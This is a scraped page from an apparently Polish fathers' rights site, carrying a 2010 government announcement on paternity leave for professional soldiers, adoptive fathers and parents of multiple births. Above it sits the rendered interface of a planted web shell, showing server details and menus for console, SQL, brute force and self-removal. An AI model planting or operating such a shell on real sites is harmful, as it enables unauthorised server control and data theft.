W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-21 08:00:40
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.80.7.173
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Inicjatywy na rzecz ojców Pełnomocnika Rządu ds. Równego Traktowania
11.05.2010.
Pełnomocnik Rządu ds. Równego Traktowania w ramach promocji aktywnego rodzicielstwa i dbałości o prawa ojców podjął dwie nowe inicjatywy - Urlop ojcowski dla żołnierzy zawodowych i Urlop ojcowski dla rodziców adopcyjnych oraz rodziców, którym urodziło się więcej niż jedno dziecko.

I.Urlop ojcowski dla żołnierzy zawodowych
Pierwsza inicjatywa dotyczy możliwości skorzystania przez żołnierzy zawodowych z urlopu ojcowskiego na zasadach przewidzianych w Kodeksie pracy.
Obecnie żołnierzom zawodowym nie przysługuje wprowadzony od 1 stycznia 2010 r.  ustawą z dnia 6 grudnia 2008 r. o zmianie ustawy – Kodeks pracy oraz niektórych innych ustaw (Dz. U. Nr 237, poz. 1654) określony w art. 1823 Kodeksu pracy urlop ojcowski.  Zgodnie z postanowieniami art. 65 ust. 1 i 65a  Ustawy z dnia 11 września 2003 r. o służbie wojskowej żołnierzy zawodowych (Dz. U. z 2008 r. Nr 141, poz. 892 ze zm.) żołnierzom zawodowym przysługuje jedynie urlop macierzyński i urlop wychowawczy na zasadach określonych w przepisach Kodeksu pracy. W opinii Ministerstwa Obrony Narodowej  Ustawa o służbie wojskowej żołnierzy zawodowych nie odsyła w sprawie urlopu ojcowskiego do stosowania postanowień Kodeksu pracy, ani też nie reguluje tej kwestii, dlatego też brak jest podstaw prawnych do twierdzenia, że żołnierzom zawodowym oprócz urlopu macierzyńskiego przysługuje również urlop ojcowski.
W związku z zaistniałą sytuacją Pani Minister Elżbieta Radziszewska wystąpiła z pismem do Ministra Obrony Narodowej o podjęcie stosownych działań zmierzających do wprowadzenia do Ustawy z dnia 11 września 2003 r. o służbie wojskowej żołnierzy zawodowych przepisów umożliwiających żołnierzom zawodowym skorzystanie z urlopów ojcowskich na zasadach przewidzianych w art 1823 Kodeksu pracy.

II Urlop ojcowski dla rodziców adopcyjnych oraz rodziców, którym urodziło się więcej niż jedno dziecko
    W świetle obowiązujących obecnie przepisów Kodeksu pracy prawo do urlopu ojcowskiego przysługuje pracownikowi-ojcu wychowującemu dziecko w okresie pierwszego roku życia dziecka. Zatem możliwość skorzystania przez pracownika-ojca wychowującego dziecko z urlopu ojcowskiego jest uzależniona wyłącznie od wieku dziecka. Urlop ten może być wykorzystany w dowolnym momencie w ciągu pierwszego roku życia dziecka. Uprawnienie to przysługuje każdemu ojcu – biologicznemu
i adopcyjnemu. W praktyce jednak wykorzystanie urlopu ojcowskiego przez ojca adopcyjnego może okazać się niemożliwe, gdyż czynności związane z wyjaśnieniem sytuacji prawnej dziecka, pozbawieniem praw rodzicielskich biologicznych rodziców, przeprowadzeniem procedur preadopcyjnych oraz orzeczeniem przysposobienia przez sąd zwykle następują już po ukończeniu przez dziecko pierwszego roku życia.
    Sytuacja ojców adopcyjnych i biologicznych w zakresie uprawnień pracowniczych wynikających z rodzicielstwa została na gruncie ustawy Kodeks pracy zrównana. W ocenie Pani Minister, kryteria szczegółowe w zakresie tych uprawnień, zwłaszcza odnoszące się do wieku dziecka, nie powinny być identyczne dla ojców biologicznych oraz adopcyjnych. Niezbędne jest dostosowanie regulacji dotyczącej uprawnienia do urlopu ojcowskiego do specyfiki instytucji przysposobienia w taki sposób, aby cel, jakiemu ma służyć ten przepis, był osiągnięty. Ojcowie adopcyjni, w związku z tym, że w praktyce procedura adopcyjna kończy się po upływie 12 miesięcy od chwili urodzenia się dziecka, znajdują się w gorszej sytuacji faktycznej niż ojcowie biologiczni.
     Przepis art. 1833 ustawy Kodeks pracy nie różnicuje również wymiaru urlopu ojcowskiego ze względu na liczbę dzieci urodzonych przy jednym porodzie (tak jak w przypadku urlopu macierzyńskiego). Niezależnie od tego, czy pracownikowi urodzą się bliźnięta, czy więcej dzieci, w 2010 i 2011 r. ma prawo jedynie do tygodnia urlopu ojcowskiego,a od 2012 roku do dwóch tygodni. Fakt urodzenia się bliźniąt lub więcej dzieci przy jednym porodzie, nie powinien pozostawać bez znaczenia dla możliwości skorzystania z prawa do urlopu ojcowskiego w zwiększonym wymiarze. W tym zakresie ustawa Kodeks pracy nie różnicuje czasu trwania urlopu ojcowskiego, co w świetle art. 18 Konstytucji RP, gwarantującym ochronę prawną i opiekę państwa rodzinie i rodzicielstwu, jest nieadekwatnym rozwiązaniem legislacyjnym.
    Mając powyższe na uwadze, Pani Minister Elżbieta Radziszewska wystąpiła do Minister Pracy i Polityki Społecznej Pani Jolanty Fedak z prośbą o doprowadzenie do zmiany przepisu art. 1833 ustawy Kodeks pracy w taki sposób, który umożliwi ojcom adopcyjnym skorzystanie z urlopu ojcowskiego po ukończeniu procedury adopcyjnej w okresie po ukończeniu przez dziecko pierwszego roku życia oraz skorzystanie przez ojców
z zwiększonego wymiaru urlopu ojcowskiego, w sytuacji urodzenia się dzieci z ciąży mnogiej.

Sporządziła: Małgorzata Perkowska
8 maja 2010 r.
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.07.2018.